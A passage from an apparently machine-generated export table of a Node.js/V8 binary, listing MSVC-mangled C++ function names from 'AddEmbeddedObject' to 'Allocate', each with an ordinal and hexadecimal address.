                                  ?AddEmbeddedObject@AssemblerBase@internal@v8@@IEAA_KV?$Handle@VHeapObject@internal@v8@@@23@@Z25100x1409fae40
                                  ?AddEntry@?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@IEAAXVInternalIndex@23@VObject@23@1@Z25110x14076c620
                                  ?AddEntry@?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAAXVInternalIndex@23@VObject@23@1@Z25120x14076c680
                                  ?AddEntry@SourcePositionTableBuilder@internal@v8@@AEAAXAEBUPositionTableEntry@23@@Z25130x1409d9090
                                  ?AddEntry@V8HeapExplorer@internal@v8@@AEAAPEAVHeapEntry@23@VHeapObject@23@@Z25140x1406da7c0
                                  ?AddEntry@V8HeapExplorer@internal@v8@@AEAAPEAVHeapEntry@23@VHeapObject@23@W4Type@423@PEBD@Z25150x1406dad30
                                  ?AddEntry@V8HeapExplorer@internal@v8@@QEAAPEAVHeapEntry@23@_KW4Type@423@PEBD0@Z25160x1406dad90
                                  ?AddEnvironmentCleanupHook@node@@YA?AV?$unique_ptr@UACHHandle@node@@UDeleteACHHandle@2@@std@@PEAVIsolate@v8@@P6AXPEAXP6AX1@Z1@Z1@Z25170x140246050
                                  ?AddEnvironmentCleanupHook@node@@YAXPEAVIsolate@v8@@P6AXPEAX@Z1@Z25180x140246240
                                  ?AddExport@WasmModuleBuilder@wasm@internal@v8@@QEAAXV?$Vector@$$CBD@34@PEAVWasmFunctionBuilder@234@@Z25190x14052ec50
                                  ?AddExport@WasmModuleBuilder@wasm@internal@v8@@QEAAXV?$Vector@$$CBD@34@W4ImportExportKindCode@234@I@Z25200x14052eca0
                                  ?AddExportedGlobal@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@_NAEBUWasmInitExpr@234@V?$Vector@$$CBD@34@@Z25210x14052ecf0
                                  ?AddFeedbackCellForCreateClosure@FeedbackVectorSpec@internal@v8@@QEAAHXZ25220x1404214f0
                                  ?AddForInSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ25230x140421500
                                  ?AddForTesting@LazilyGeneratedNames@wasm@internal@v8@@QEAAXHVWireBytesRef@234@@Z25240x140527790
                                  ?AddFormalParameter@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@PEAVExpression@23@1H_N@Z25250x1406f8ff0
                                  ?AddFreshPage@NewSpace@internal@v8@@QEAA_NXZ25260x1408d0290
                                  ?AddFreshPageSynchronized@NewSpace@internal@v8@@QEAA_NXZ25270x1408d0360
                                  ?AddFunction@WasmModuleBuilder@wasm@internal@v8@@QEAAPEAVWasmFunctionBuilder@234@PEAV?$Signature@VValueType@wasm@internal@v8@@@34@@Z25280x14052ed60
                                  ?AddFunctionForNameInference@Parser@internal@v8@@AEAAXPEAVFunctionLiteral@23@@Z25290x1406f90c0
                                  ?AddFunctionForTesting@WasmInterpreter@wasm@internal@v8@@QEAAXPEBUWasmFunction@234@@Z25300x140542430
                                  ?AddGCEpilogueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@@Z1@Z25310x140a79310
                                  ?AddGCEpilogueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@PEAX@Z31@Z25320x140a79330
                                  ?AddGCPrologueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@@Z1@Z25330x140a79350
                                  ?AddGCPrologueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@PEAX@Z31@Z25340x140a79370
                                  ?AddGlobal@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@_NAEBUWasmInitExpr@234@@Z25350x14052ee10
                                  ?AddGlobalImport@WasmModuleBuilder@wasm@internal@v8@@QEAAIV?$Vector@$$CBD@34@VValueType@234@_N0@Z25360x14052eea0
                                  ?AddGoto@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@0@Z25370x140e423b0
                                  ?AddHeapObjectAllocationTracker@Heap@internal@v8@@QEAAXPEAVHeapObjectAllocationTracker@23@@Z25380x140928b90
                                  ?AddImmediate@InstructionSequence@compiler@internal@v8@@QEAA?AVImmediateOperand@234@AEBVConstant@234@@Z25390x1404531f0
                                  ?AddImport@WasmModuleBuilder@wasm@internal@v8@@QEAAIV?$Vector@$$CBD@34@PEAV?$Signature@VValueType@wasm@internal@v8@@@34@0@Z25400x14052ef70
                                  ?AddIncrementalMarkingStep@GCTracer@internal@v8@@QEAAXN_K@Z25410x14093f6a0
                                  ?AddInlinedFunction@OptimizedCompilationInfo@internal@v8@@QEAAHV?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VBytecodeArray@internal@v8@@@23@VSourcePosition@23@@Z25420x1409dc9e0
                                  ?AddInnerScope@Scope@internal@v8@@AEAAXPEAV123@@Z25430x1406410f0
                                  ?AddInputsToFrameStateDescriptor@InstructionSelector@compiler@internal@v8@@AEAA_KPEAVFrameStateDescriptor@234@PEAVNode@234@PEAVOperandGenerator@234@PEAVStateObjectDeduplicator@234@PEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@W4FrameStateInputKind@234@PEAVZone@34@@Z25440x140e347a0
                                  ?AddInputsToFrameStateDescriptor@InstructionSelector@compiler@internal@v8@@AEAA_KPEAVStateValueList@234@PEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@PEAVOperandGenerator@234@PEAVStateObjectDeduplicator@234@PEAVNode@234@W4FrameStateInputKind@234@PEAVZone@34@@Z25450x140e34b70
                                  ?AddInstance@WasmMemoryObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VWasmMemoryObject@internal@v8@@@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@@Z25460x14051eed0
                                  ?AddInstanceOfSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ25470x140421520
                                  ?AddInstruction@InstructionScheduler@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z25480x140ea4900
                                  ?AddInstruction@InstructionSelector@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z25490x140e34cd0
                                  ?AddInstruction@InstructionSequence@compiler@internal@v8@@QEAAHPEAVInstruction@234@@Z25500x140e04120
                                  ?AddIsolate@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z25510x14055cf40
                                  ?AddItem@ItemParallelJob@internal@v8@@QEAAXPEAVItem@123@@Z25520x1406cc9c0
                                  ?AddJumpTable@CodeGenerator@compiler@internal@v8@@AEAAPEAVLabel@34@PEAPEAV534@_K@Z25530x140e47890
                                  ?AddKeyNoResize@StringTable@internal@v8@@SA?AV?$Handle@VString@internal@v8@@@23@PEAVIsolate@23@PEAVStringTableKey@23@@Z25540x14076c6e0
                                  ?AddKeyedHasICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ25550x140421540
                                  ?AddKeyedLoadICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ25560x140421560
                                  ?AddKeyedStoreICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4LanguageMode@23@@Z25570x140421580
                                  ?AddLinkedBinding@node@@YAXPEAVEnvironment@1@AEBUnapi_module@@@Z25580x1402487e0
                                  ?AddLinkedBinding@node@@YAXPEAVEnvironment@1@AEBUnode_module@1@@Z25590x140248830
                                  ?AddLinkedBinding@node@@YAXPEAVEnvironment@1@PEBDP6AXV?$Local@VObject@v8@@@v8@@V?$Local@VValue@v8@@@4@V?$Local@VContext@v8@@@4@PEAX@Z5@Z25600x140248940
                                  ?AddList@BytecodeLoopAssignments@compiler@internal@v8@@QEAAXVRegister@interpreter@34@I@Z25610x140e9f830
                                  ?AddLiteralChar@Scanner@internal@v8@@AEAAXD@Z25620x1404215b0
                                  ?AddLiteralChar@Scanner@internal@v8@@AEAAXH@Z25630x1404215f0
                                  ?AddLiteralCharAdvance@Scanner@internal@v8@@AEAAXXZ25640x140421660
                                  ?AddLiteralSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ25650x140421710
                                  ?AddLoadGlobalICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4TypeofMode@23@@Z25660x140421730
                                  ?AddLoadICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ25670x140421760
                                  ?AddLocal@DeclarationScope@internal@v8@@QEAAXPEAVVariable@23@@Z25680x140a52650
                                  ?AddLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAIVValueType@234@@Z25690x14052f020
                                  ?AddLocals@LocalDeclEncoder@wasm@internal@v8@@QEAAIIVValueType@234@@Z25700x14059a800
                                  ?AddMessageListener@Isolate@v8@@QEAA_NP6AXV?$Local@VMessage@v8@@@2@V?$Local@VValue@v8@@@2@@Z1@Z25710x140a79390
                                  ?AddMessageListenerWithErrorLevel@Isolate@v8@@QEAA_NP6AXV?$Local@VMessage@v8@@@2@V?$Local@VValue@v8@@@2@@ZH1@Z25720x140a793a0
                                  ?AddMicrotasksCompletedCallback@Isolate@v8@@QEAAXP6AXPEAV12@@Z@Z25730x140a79580
                                  ?AddMicrotasksCompletedCallback@Isolate@v8@@QEAAXP6AXPEAV12@PEAX@Z1@Z25740x140a795a0
                                  ?AddMicrotasksCompletedCallback@MicrotaskQueue@internal@v8@@UEAAXP6AXPEAVIsolate@3@PEAX@Z1@Z25750x14096f330
                                  ?AddMissingTransitions@Map@internal@v8@@CA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VDescriptorArray@internal@v8@@@23@V?$Handle@VLayoutDescriptor@internal@v8@@@23@@Z25760x14078ef40
                                  ?AddMove@ParallelMove@compiler@internal@v8@@QEAAPEAVMoveOperands@234@AEBVInstructionOperand@234@0@Z25770x140453260
                                  ?AddMove@ParallelMove@compiler@internal@v8@@QEAAPEAVMoveOperands@234@AEBVInstructionOperand@234@0PEAVZone@34@@Z25780x140453270
                                  ?AddNearHeapLimitCallback@Heap@internal@v8@@QEAAXP6A_KPEAX_K1@Z0@Z25790x140928c00
                                  ?AddNearHeapLimitCallback@Isolate@v8@@QEAAXP6A_KPEAX_K1@Z0@Z25800x140a795b0
                                  ?AddNode@BasicBlock@compiler@internal@v8@@QEAAXPEAVNode@234@@Z25810x140453360
                                  ?AddNode@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z25820x140ec2a50
                                  ?AddNode@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEBVOperator@234@@Z25830x140e69680
                                  ?AddNode@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEBVOperator@234@HPEBQEAV5234@@Z25840x140ee1480
                                  ?AddNode@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z25850x140e42420
                                  ?AddOperandToStateValueDescriptor@InstructionSelector@compiler@internal@v8@@AEAA_KPEAVStateValueList@234@PEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@PEAVOperandGenerator@234@PEAVStateObjectDeduplicator@234@PEAVNode@234@VMachineType@34@W4FrameStateInputKind@234@PEAVZone@34@@Z25860x140e34d30
                                  ?AddOptimizedCode@NativeContext@internal@v8@@QEAAXVCode@23@@Z25870x14082f7e0
                                  ?AddOptimizedCode@OSROptimizedCodeCache@internal@v8@@SAXV?$Handle@VNativeContext@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VCode@internal@v8@@@23@VBailoutId@23@@Z25880x14075b790
                                  ?AddOrDisposeString@StringsStorage@internal@v8@@AEAAPEBDPEADH@Z25890x1406cd580
                                  ?AddOverload@AsmOverloadedFunctionType@wasm@internal@v8@@QEAAXPEAVAsmType@234@@Z25900x140a62c40
                                  ?AddPage@LargeObjectSpace@internal@v8@@UEAAXPEAVLargePage@23@_K@Z25910x14091d240
                                  ?AddPage@PagedSpace@internal@v8@@QEAA_KPEAVPage@23@@Z25920x1408d03a0
                                  ?AddPathFromEnd@ProfileTree@internal@v8@@QEAAPEAVProfileNode@23@AEBV?$vector@PEAVCodeEntry@internal@v8@@V?$allocator@PEAVCodeEntry@internal@v8@@@std@@@std@@H_N@Z25930x1406d4b40
                                  ?AddPathFromEnd@ProfileTree@internal@v8@@QEAAPEAVProfileNode@23@AEBV?$vector@UProfileStackFrame@internal@v8@@V?$allocator@UProfileStackFrame@internal@v8@@@std@@@std@@H_NW4CpuProfilingMode@3@PEAVContextFilter@23@@Z25940x1406d4bf0
                                  ?AddPathToCurrentProfiles@CpuProfilesCollection@internal@v8@@QEAAXVTimeTicks@base@3@AEBV?$vector@UProfileStackFrame@internal@v8@@V?$allocator@UProfileStackFrame@internal@v8@@@std@@@std@@H_NVTimeDelta@53@@Z25950x1406d4cf0
                                  ?AddPhi@InstructionBlock@compiler@internal@v8@@QEAAXPEAVPhiInstruction@234@@Z25960x140453360
                                  ?AddPosition@SourcePositionTableBuilder@internal@v8@@QEAAX_KVSourcePosition@23@_N@Z25970x1409d91b0
                                  ?AddPotentiallyDeadCode@WasmEngine@wasm@internal@v8@@QEAA_NPEAVWasmCode@234@@Z25980x14055cff0
                                  ?AddPredecessor@BasicBlock@compiler@internal@v8@@QEAAXPEAV1234@@Z25990x140e425c0
                                  ?AddProperty@JSObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z26000x1407b11c0
                                  ?AddPropertyClassRange@RegExpParser@internal@v8@@QEAA_NPEAV?$ZoneList@VCharacterRange@internal@v8@@@23@_NAEBV?$ZoneVector@D@23@2@Z26010x1406a8f20
                                  ?AddProtectedInstructionLanding@CodeGenerator@compiler@internal@v8@@QEAAXII@Z26020x140e47930
                                  ?AddRange@AddressToTraceMap@internal@v8@@QEAAX_KHI@Z26030x1406e9270
                                  ?AddRanger@OperationTyper@compiler@internal@v8@@AEAA?AVType@234@NNNN@Z26040x140ff9a20
                                  ?AddRawLiteralChar@Scanner@internal@v8@@AEAAXH@Z26050x140421780
                                  ?AddReducer@GraphReducer@compiler@internal@v8@@QEAAXPEAVReducer@234@@Z26060x140ea1bd0
                                  ?AddRef@WasmCodeRefScope@wasm@internal@v8@@SAXPEAVWasmCode@234@@Z26070x14056e530
                                  ?AddResumeTarget@LoopInfo@compiler@internal@v8@@QEAAXAEBVResumeJumpTarget@234@@Z26080x140dd7f20
                                  ?AddRetainedMap@Heap@internal@v8@@QEAAXV?$Handle@VNativeContext@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@@Z26090x140928ca0
                                  ?AddReturn@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z26100x140e425e0
                                  ?AddSample@ProfilerEventsProcessor@internal@v8@@QEAAXUTickSample@23@@Z26110x1406e7330
                                  ?AddScheduledBytesToMark@IncrementalMarking@internal@v8@@AEAAX_K@Z26120x140920380
                                  ?AddScopeSample@GCTracer@internal@v8@@QEAAXW4ScopeId@Scope@123@N@Z26130x1408cb810
                                  ?AddSharedWasmMemory@Isolate@internal@v8@@QEAAXV?$Handle@VWasmMemoryObject@internal@v8@@@23@@Z26140x140979790
                                  ?AddSignature@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEAV?$Signature@VValueType@wasm@internal@v8@@@34@@Z26150x14052f040
                                  ?AddSlot@FeedbackVectorSpec@internal@v8@@AEAA?AVFeedbackSlot@23@W4FeedbackSlotKind@23@@Z26160x1407f5360
                                  ?AddStoreDataPropertyInLiteralICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ26170x1404217f0
                                  ?AddStoreGlobalICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4LanguageMode@23@@Z26180x140421810
                                  ?AddStoreICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4LanguageMode@23@@Z26190x140421840
                                  ?AddStoreInArrayLiteralICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ26200x140421870
                                  ?AddStoreOwnICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ26210x140421890
                                  ?AddStructType@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEAVStructType@234@@Z26220x14052f110
                                  ?AddSuccessor@BasicBlock@compiler@internal@v8@@QEAAXPEAV1234@@Z26230x140e42670
                                  ?AddSuccessor@Schedule@compiler@internal@v8@@AEAAXPEAVBasicBlock@234@0@Z26240x140e42690
                                  ?AddSuccessorForTesting@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@0@Z26250x140459410
                                  ?AddSurvivalRatio@GCTracer@internal@v8@@QEAAXN@Z26260x14093f6c0
                                  ?AddSwitch@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@PEAPEAV5234@_K@Z26270x140e426e0
                                  ?AddTable@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@I@Z26280x14052f150
                                  ?AddTable@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@II@Z26290x14052f1a0
                                  ?AddTailCall@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z26300x140e427c0
                                  ?AddTask@ItemParallelJob@internal@v8@@QEAAXPEAVTask@123@@Z26310x1408dcbf0
                                  ?AddTemplateExpression@Parser@internal@v8@@AEAAXPEAPEAVTemplateLiteral@123@PEAVExpression@23@@Z26320x14072ad20
                                  ?AddTemplateSpan@Parser@internal@v8@@AEAAXPEAPEAVTemplateLiteral@123@_N1@Z26330x14072ad80
                                  ?AddTerminator@InstructionScheduler@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z26340x140ea4ed0
                                  ?AddTerminator@InstructionSelector@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z26350x140e350a0
                                  ?AddThrow@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z26360x140e42850
                                  ?AddToEnd@WeakArrayList@internal@v8@@SA?AV?$Handle@VWeakArrayList@internal@v8@@@23@PEAVIsolate@23@V423@AEBVMaybeObjectHandle@23@2@Z26370x14076c840
                                  ?AddToEnd@WeakArrayList@internal@v8@@SA?AV?$Handle@VWeakArrayList@internal@v8@@@23@PEAVIsolate@23@V423@AEBVMaybeObjectHandle@23@@Z26380x14076ca70
                                  ?AddToEquivalenceSet@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXPEAVRegisterInfo@1234@0@Z26390x140870d20
                                  ?AddToScriptList@Factory@internal@v8@@AEAAXV?$Handle@VScript@internal@v8@@@23@@Z26400x140943a70
                                  ?AddToScriptList@OffThreadFactory@internal@v8@@AEAAXV?$Handle@VScript@internal@v8@@@23@@Z26410x1408e4780
                                  ?AddToScriptList@OffThreadHeap@internal@v8@@QEAAXV?$Handle@VScript@internal@v8@@@23@@Z26420x1408e3480
                                  ?AddToUnion@Type@compiler@internal@v8@@CAHV1234@PEAVUnionType@234@HPEAVZone@34@@Z26430x140e2eb60
                                  ?AddTransferHandleStorage@OffThreadIsolate@internal@v8@@AEAAPEAVOffThreadTransferHandleStorage@23@VHandleBase@23@@Z26440x14096ef80
                                  ?AddTranslationForOperand@CodeGenerator@compiler@internal@v8@@AEAAXPEAVTranslation@34@PEAVInstruction@234@PEAVInstructionOperand@234@VMachineType@34@@Z26450x140e47960
                                  ?AddTypeProfileSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ26460x1407f5510
                                  ?AddUInt64@Bignum@internal@v8@@QEAAX_K@Z26470x140847af0
                                  ?AddUnresolved@Scope@internal@v8@@QEAAXPEAVVariableProxy@23@@Z26480x140a52660
                                  ?AddUseInterval@TopLevelLiveRange@compiler@internal@v8@@QEAAXVLifetimePosition@234@0PEAVZone@34@_N@Z26490x140ef0560
                                  ?AddUsePosition@TopLevelLiveRange@compiler@internal@v8@@QEAAXPEAVUsePosition@234@_N@Z26500x140ef0690
                                  ?AddWrapperInfoForTesting@ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAAXU?$pair@PEAXPEAX@std@@@Z26510x14095a130
                                  ?AddressUsesRegister@Operand@internal@v8@@QEBA_NVRegister@23@@Z26520x1404a0e00
                                  ?AdjustAmountOfExternalAllocatedMemory@Isolate@v8@@QEAA_J_J@Z26530x140077240
                                  ?AdjustRepresentation@OrderedHashMapHandler@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashMap@internal@v8@@@23@@Z26540x14075d500
                                  ?AdjustRepresentation@OrderedHashSetHandler@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedHashSet@internal@v8@@@23@@Z26550x14075d670
                                  ?AdjustRepresentation@OrderedNameDictionaryHandler@internal@v8@@KA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSmallOrderedNameDictionary@internal@v8@@@23@@Z26560x14075d790
                                  ?AdjustSamplingInterval@CpuProfiler@internal@v8@@AEAAXXZ26570x1406e73c0
                                  ?AdjustSchedulingParams@OS@base@v8@@SAXXZ26580x1400768e0
                                  ?AdjustStackLimitForSimulator@StackGuard@internal@v8@@QEAAXXZ26590x14096c680
                                  ?Advance@BytecodeArrayIterator@interpreter@internal@v8@@QEAAXXZ26600x14088a2d0
                                  ?Advance@Iterator@BitVector@internal@v8@@QEAAXXZ26610x140453380
                                  ?Advance@JavaScriptFrameIterator@internal@v8@@QEAAXXZ26620x1409889c0
                                  ?Advance@RegExpParser@internal@v8@@QEAAXH@Z26630x1406a9830
                                  ?Advance@RegExpParser@internal@v8@@QEAAXXZ26640x1406a9840
                                  ?Advance@RelocIterator@internal@v8@@AEAAXH@Z26650x1404360a0
                                  ?Advance@SourcePositionTableIterator@internal@v8@@QEAAXXZ26660x1409d91e0
                                  ?Advance@StackFrameIterator@internal@v8@@QEAAXXZ26670x140988b30
                                  ?Advance@StackTraceFrameIterator@internal@v8@@QEAAXXZ26680x140988bf0
                                  ?Advance@iterator@StateValuesAccess@compiler@internal@v8@@AEAAXXZ26690x140ea7ce0
                                  ?AdvanceCurrentPosition@RegExpBytecodeGenerator@internal@v8@@UEAAXH@Z26700x1406c8d80
                                  ?AdvanceCurrentPosition@RegExpMacroAssemblerX64@internal@v8@@UEAAXH@Z26710x140443360
                                  ?AdvanceGetTag@RelocIterator@internal@v8@@AEAAHXZ26720x1409da780
                                  ?AdvanceLastProcessedMarker@LiveRange@compiler@internal@v8@@AEBAXPEAVUseInterval@234@VLifetimePosition@234@@Z26730x140ef0780
                                  ?AdvanceLocation@EhFrameWriter@internal@v8@@QEAAXH@Z26740x1409a5030
                                  ?AdvanceOnAllocation@IncrementalMarking@internal@v8@@AEAAXXZ26750x1409203a0
                                  ?AdvanceOneFrame@StackTraceFrameIterator@internal@v8@@QEAAXXZ26760x1404360b0
                                  ?AdvanceReadData@RelocIterator@internal@v8@@AEAAXXZ26770x1409da790
                                  ?AdvanceReadInt@RelocIterator@internal@v8@@AEAAXXZ26780x1409da820
                                  ?AdvanceReadLongPCJump@RelocIterator@internal@v8@@AEAAXXZ26790x1409da860
                                  ?AdvanceReadPC@RelocIterator@internal@v8@@AEAAXXZ26800x1409da8a0
                                  ?AdvanceRegister@RegExpBytecodeGenerator@internal@v8@@UEAAXHH@Z26810x1406c8e10
                                  ?AdvanceRegister@RegExpMacroAssemblerX64@internal@v8@@UEAAXHH@Z26820x1404433a0
                                  ?AdvanceTillNotEmpty@iterator@StateValuesAccess@compiler@internal@v8@@QEAA_KXZ26830x140ea7d10
                                  ?AdvanceToNextPage@PagedSpaceObjectIterator@internal@v8@@AEAA_NXZ26840x1408d04e0
                                  ?AdvanceWithDeadline@IncrementalMarking@internal@v8@@QEAA?AW4StepResult@23@NW4CompletionAction@123@W4StepOrigin@23@@Z26850x140920700
                                  ?AggregateError_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ26860x1404218b0
                                  ?AggregateError_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ26870x140727500
                                  ?Align@Assembler@internal@v8@@QEAAXH@Z26880x1404a0e80
                                  ?Align@Bignum@internal@v8@@AEAAXAEBV123@@Z26890x140847b60
                                  ?AlignFrame@Frame@compiler@internal@v8@@QEAAHH@Z26900x140e45bd0
                                  ?AlignSavedCalleeRegisterSlots@Frame@compiler@internal@v8@@QEAAXH@Z26910x140453470
                                  ?AlignedAlloc@internal@v8@@YAPEAX_K0@Z26920x1405f3e30
                                  ?AlignedFree@internal@v8@@YAXPEAX@Z26930x1405f3eb0
                                  ?AlignmentRequirements@InstructionSelector@compiler@internal@v8@@SA?AV0MachineOperatorBuilder@234@XZ26940x140459420
                                  ?AllBitsClearInRange@?$ConcurrentBitmap@$00@internal@v8@@QEAA_NII@Z26950x1408eeef0
                                  ?AllBitsSetInRange@?$ConcurrentBitmap@$00@internal@v8@@QEAA_NII@Z26960x1408eef80
                                  ?AllFramesOnStackAreBlackboxed@Debug@internal@v8@@QEAA_NXZ26970x1409be000
                                  ?AllValueInputsAreTyped@NodeProperties@compiler@internal@v8@@SA_NPEAVNode@234@@Z26980x140e43980
                                  ?AllocatableMemoryInCodePage@MemoryChunkLayout@internal@v8@@SA_KXZ26990x1408eeae0
                                  ?AllocatableMemoryInDataPage@MemoryChunkLayout@internal@v8@@SA_KXZ27000x1408eeb30
                                  ?AllocatableMemoryInMemoryChunk@MemoryChunkLayout@internal@v8@@SA_KW4AllocationSpace@23@@Z27010x1408eeb40
                                  ?AllocatableRegisters@CallDescriptor@compiler@internal@v8@@QEBAIXZ27020x140329550
                                  ?Allocate@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@KA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@HW4AllocationType@23@@Z27030x14075d910
                                  ?Allocate@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@KA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@HW4AllocationType@23@@Z27040x14075da00
                                  ?Allocate@?$OrderedHashTableHandler@VSmallOrderedHashMap@internal@v8@@VOrderedHashMap@23@@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@H@Z27050x14075daf0
                                  ?Allocate@?$OrderedHashTableHandler@VSmallOrderedHashSet@internal@v8@@VOrderedHashSet@23@@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@H@Z27060x14075db50
                                  ?Allocate@?$OrderedHashTableHandler@VSmallOrderedNameDictionary@internal@v8@@VOrderedNameDictionary@23@@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@H@Z27070x14075dbb0
                                  ?Allocate@BackingStore@internal@v8@@SA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@PEAVIsolate@23@_KW4SharedFlag@23@W4InitializedFlag@23@@Z27080x14083e580
                                  ?Allocate@DisjointAllocationPool@wasm@internal@v8@@QEAA?AVAddressRegion@base@4@_K@Z27090x14056e590
                                  ?Allocate@FreeListFastAlloc@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z27100x1408d0510
                                  ?Allocate@FreeListLegacy@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z27110x1408d0620
                                  ?Allocate@FreeListMany@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z27120x1408d0860
                                  ?Allocate@FreeListManyCached@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z27130x1408d09a0
                                  ?Allocate@FreeListManyCachedFastPath@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z27140x1408d0b20
                                  ?Allocate@FreeListManyCachedOrigin@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z27150x1408d0e00
                                  ?Allocate@FreeListMap@internal@v8@@UEAA?AVFreeSpace@23@_KPEA_KW4AllocationOrigin@23@@Z27160x1408d0e40
                                  ?Allocate@Isolate@v8@@SAPEAV12@XZ27170x140a79610
                                  ?Allocate@JSGraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@W4AllocationType@34@PEAV5234@@Z27180x140ec2ab0
                                  ?Allocate@OS@base@v8@@CAPEAXPEAX_K1W4MemoryPermission@123@@Z27190x140dc0480
                                  ?Allocate@OrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@HW4AllocationType@23@@Z27200x14075dc00
                                  ?Allocate@OrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@HW4AllocationType@23@@Z27210x14075dc20
                                  ?Allocate@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VType@234@W4AllocationType@34@@Z27220x140ebb8e0
